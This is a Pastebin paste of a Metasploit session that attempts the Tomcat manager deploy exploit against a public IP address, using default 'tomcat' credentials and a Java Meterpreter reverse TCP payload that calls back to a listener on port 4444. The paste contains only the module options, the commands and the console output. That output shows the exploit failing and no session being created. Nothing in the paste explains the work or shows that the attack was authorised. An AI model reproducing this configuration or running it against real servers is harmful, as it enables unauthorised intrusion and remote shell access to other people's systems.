Advertisement
Guest User

Untitled

a guest
Mar 18th, 2019
96
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.62 KB | None | 0 0
  1. Module options (exploit/multi/http/tomcat_mgr_deploy):
  2.  
  3. Name Current Setting Required Description
  4. ---- --------------- -------- -----------
  5. HttpPassword tomcat no The password for the specified username
  6. HttpUsername tomcat no The username to authenticate as
  7. PATH /manager/html yes The URI path of the manager app (/deploy and /undeploy will be used)
  8. Proxies no A proxy chain of format type:host:port[,type:host:port][...]
  9. RHOST 35.237.149.50 yes The target address
  10. RPORT 8080 yes The target port (TCP)
  11. SSL false no Negotiate SSL/TLS for outgoing connections
  12. VHOST no HTTP server virtual host
  13.  
  14.  
  15. Payload options (java/meterpreter/reverse_tcp):
  16.  
  17. Name Current Setting Required Description
  18. ---- --------------- -------- -----------
  19. LHOST 192.168.0.198 yes The listen address
  20. LPORT 4444 yes The listen port
  21.  
  22.  
  23. Exploit target:
  24.  
  25. Id Name
  26. -- ----
  27. 0 Automatic
  28.  
  29.  
  30. msf5 exploit(multi/http/tomcat_mgr_deploy) > set PATH /manager
  31. PATH => /manager
  32. msf5 exploit(multi/http/tomcat_mgr_deploy) > exploit
  33.  
  34. [*] Started reverse TCP handler on 192.168.0.198:4444
  35. [*] Attempting to automatically select a target...
  36. [-] Failed: Error requesting /manager/serverinfo
  37. [-] Exploit aborted due to failure: no-target: Unable to automatically select a target
  38. [*] Exploit completed, but no session was created.
  39. msf5 exploit(multi/http/tomcat_mgr_deploy) >
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement